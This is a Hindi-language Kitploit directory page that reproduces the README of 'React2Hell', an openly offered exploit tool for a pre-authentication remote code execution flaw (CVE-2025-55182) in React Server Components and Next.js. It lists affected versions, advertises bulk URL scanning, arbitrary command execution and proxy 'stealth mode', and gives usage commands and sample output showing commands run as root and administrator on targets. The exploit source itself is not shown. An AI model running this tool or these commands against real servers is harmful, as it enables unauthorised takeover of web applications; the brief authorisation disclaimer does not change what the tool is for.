Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
React2Hell — [React2Hell] Next.js/React Server RCE Exploit — CVE-2025-55182 | Kitploit
उपकरण/GitHubGitHub/aggressiveuser/react2hell
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubaggressiveuser/react2hell

React2Hell

[React2Hell] Next.js/React Server RCE Exploit — CVE-2025-55182

रिपॉजिटरी देखें
38 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🧨 React2Hell — CVE-2025-55182 शोषण

🔥 Next.js / React Server रिमोट कोड निष्पादन (RCE) शोषण

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 अवलोकन

React2Hell एक शक्तिशाली शोषण उपकरण है जिसे CVE-2025-55182 का परीक्षण और शोषण करने के लिए डिज़ाइन किया गया है, जो Next.js और React Server Actions को प्रभावित करने वाली एक गंभीर रिमोट कोड निष्पादन भेद्यता है।

React Server Components संस्करण 19.0.0, 19.1.0, 19.1.1 और 19.2.0 में एक प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन भेद्यता मौजूद है, जिसमें निम्नलिखित पैकेज शामिल हैं: react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack। भेद्य कोड सर्वर फ़ंक्शन एंडपॉइंट पर HTTP अनुरोधों से पेलोड को असुरक्षित रूप से डिसीरियलाइज़ करता है।


✨ विशेषताएँ

  • 🧨 रिमोट कोड निष्पादन (RCE)
  • 🌐 एकल URL / बल्क URL स्कैनिंग
  • 🧩 कस्टम कमांड निष्पादन
  • 🕵️‍♂️ प्रॉक्सी समर्थन के साथ स्टील्थ मोड
  • ⚡ तेज़, विश्वसनीय और उपयोग में आसान

📌 उपयोग

एकल लक्ष्य मोड

root@kitploit:~
python exploit.py -u https://target.com -c "whoami"

एकाधिक लक्ष्य (फ़ाइल से)

root@kitploit:~
python exploit.py -l urls.txt -c "whoami"

HTTP प्रॉक्सी के साथ (Burp Suite)

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

HTTPS प्रॉक्सी के साथ

root@kitploit:~
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 urls.txt उदाहरण

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ नमूना आउटपुट

root@kitploit:~
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██  ██ ▄▄▄▄▄ ▄▄    ▄▄
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██████ ██▄▄  ██    ██
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄

 Next.js/React Server RCE Exploit — CVE-2025-55182
   Author: Chetanya Sharma (AggressiveUser)

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://meow.host:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://evil.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://vul.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया है। इसे स्पष्ट प्राधिकरण के बिना सिस्टम पर उपयोग न करें। आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं।


⭐ परियोजना का समर्थन करें

यदि इस शोषण ने आपकी मदद की, तो GitHub पर ⭐ छोड़ने पर विचार करें ❤️


👤 लेखक

Chetanya Sharma (AggressiveUser)

🔥 से बनाया गया उन व्यक्ति द्वारा जो चीजों को तोड़ना और ठीक करना पसंद करता है।

टूल डाउनलोड करें